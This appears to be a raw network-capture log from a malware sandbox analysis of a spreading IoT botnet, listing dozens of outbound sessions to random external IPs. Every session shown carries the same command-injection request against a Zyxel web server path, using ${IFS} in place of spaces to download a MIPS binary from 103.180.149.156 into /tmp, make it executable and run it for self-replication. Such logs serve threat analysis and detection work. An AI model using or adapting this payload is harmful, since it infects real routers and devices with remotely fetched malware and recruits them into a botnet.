                                                        Feb 2, 2024 06:21:21.156007051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7084192.168.2.144603262.62.104.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156085014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7085192.168.2.1460952132.246.51.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156097889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7086192.168.2.1438734193.135.91.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156121969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7087192.168.2.1445186204.0.31.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156157017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7088192.168.2.145110032.220.241.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156192064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7089192.168.2.145211452.140.105.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156213999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7090192.168.2.1432934162.164.5.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156264067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7091192.168.2.1455168178.48.37.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156311035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7092192.168.2.143761694.202.188.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156332970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7093192.168.2.1438948164.122.251.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156373024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7094192.168.2.145872266.121.40.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156435966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7095192.168.2.1442338159.189.211.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156471968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7096192.168.2.1440098189.120.251.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156507969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7097192.168.2.1439628134.105.223.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156546116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7098192.168.2.144518872.38.20.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156594038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7099192.168.2.143311296.206.61.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156626940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7100192.168.2.1446916212.247.99.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156672955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7101192.168.2.145361699.150.104.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156717062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7102192.168.2.1447318112.43.117.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156752110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7103192.168.2.1434732200.198.109.233443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156781912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7104192.168.2.145197866.165.87.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156831026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7105192.168.2.1454342120.152.158.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156833887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7106192.168.2.1444980179.174.167.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156867027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7107192.168.2.143743832.241.170.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156919956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7108192.168.2.143855449.109.21.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156949997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7109192.168.2.145324638.155.4.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.156977892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7110192.168.2.1456432123.43.35.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157026052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7111192.168.2.144291448.10.171.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157082081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7112192.168.2.1441232182.119.23.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157123089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7113192.168.2.145619837.64.72.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157172918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7114192.168.2.1438652148.146.37.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157207966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7115192.168.2.1437350154.147.227.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157253981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7116192.168.2.145117064.51.206.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157306910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7117192.168.2.1436688138.18.44.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157346964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7118192.168.2.145837274.94.235.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157367945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7119192.168.2.1452790207.154.53.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157424927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7120192.168.2.1459246171.107.72.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157458067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7121192.168.2.1457234179.4.196.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157493114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7122192.168.2.144581836.169.146.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157533884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7123192.168.2.1450640148.96.130.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157579899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7124192.168.2.1445534194.71.158.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157604933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7125192.168.2.143845499.109.232.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157628059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7126192.168.2.145580612.243.3.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157702923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7127192.168.2.1454468111.231.161.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157730103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7128192.168.2.145366254.46.105.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157788992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7129192.168.2.1446454100.145.59.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157793045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7130192.168.2.1434268125.198.174.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157850027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7131192.168.2.144413250.81.54.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157866001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7132192.168.2.1443920196.105.58.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157907009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7133192.168.2.1449968160.83.60.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157943010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7134192.168.2.144031859.190.87.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.157996893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7135192.168.2.1447242213.164.38.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.158020020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7136192.168.2.1449998111.240.222.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.158080101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7137192.168.2.144568838.146.7.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.158101082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7138192.168.2.143773224.75.232.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.158142090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7139192.168.2.143568478.246.213.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.158164024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7140192.168.2.143811292.100.165.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.158233881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7141192.168.2.143593481.57.133.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.158293009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7142192.168.2.1444320131.186.95.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.158337116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7143192.168.2.1451952170.107.228.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.158360004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7144192.168.2.1436650222.243.241.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.158390045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7145192.168.2.1438422124.82.164.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.158452988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7146192.168.2.1433832167.74.172.235443
                                                        TimestampBytes transferredDirectionData
